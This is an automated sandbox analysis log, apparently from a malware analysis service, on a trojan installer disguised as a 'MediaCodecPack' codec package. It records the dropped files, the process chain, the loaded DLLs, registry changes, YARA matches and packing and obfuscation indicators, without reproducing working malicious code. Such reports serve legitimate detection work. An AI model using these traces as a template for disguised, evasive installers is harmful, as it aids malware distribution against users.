                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: String function: 00B22A10 appears 135 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: String function: 00B17760 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: String function: 004460A4 appears 59 times
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-F7SVI.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-F7SVI.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-F7SVI.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.2.drStatic PE information: Number of sections : 19 > 10
                    Source: is-7LIEI.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal96.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B0F8D0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,2_2_00B0F8D0
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00401CE4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00401C49 StartServiceCtrlDispatcherA,2_2_00401C49
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00401C49 StartServiceCtrlDispatcherA,2_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmpJump to behavior
                    Source: Yara matchFile source: 2.0.mediacodecpack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3557131784.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.1708594819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-F43ND.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: newwork.exe.1.exeReversingLabs: Detection: 15%
                    Source: newwork.exe.1.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: newwork.exe.1.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile read: C:\Users\user\Desktop\newwork.exe.1.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\newwork.exe.1.exe "C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -iJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: newwork.exe.1.exeStatic file information: File size 3314669 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-NF7R8.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-R0E3S.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-NF7R8.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-2R56A.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-R0E3S.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 2.2.mediacodecpack.exe.400000.0.unpack .aitt4:ER;.ajtt4:R;.aktt4:W;.rsrc:R;.altt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 2.2.mediacodecpack.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .aitt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aitt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .ajtt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aktt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .altt4
                    Source: is-2R56A.tmp.1.drStatic PE information: section name: Shared
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /4
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /19
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /35
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /51
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /63
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /77
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /89
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /102
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /113
                    Source: is-7LIEI.tmp.1.drStatic PE information: section name: /124
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .aitt4
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .ajtt4
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .aktt4
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .altt4
                    Source: sqlite3.dll.2.drStatic PE information: section name: /4
                    Source: sqlite3.dll.2.drStatic PE information: section name: /19
                    Source: sqlite3.dll.2.drStatic PE information: section name: /35
                    Source: sqlite3.dll.2.drStatic PE information: section name: /51
                    Source: sqlite3.dll.2.drStatic PE information: section name: /63
                    Source: sqlite3.dll.2.drStatic PE information: section name: /77
                    Source: sqlite3.dll.2.drStatic PE information: section name: /89
                    Source: sqlite3.dll.2.drStatic PE information: section name: /102
                    Source: sqlite3.dll.2.drStatic PE information: section name: /113
                    Source: sqlite3.dll.2.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
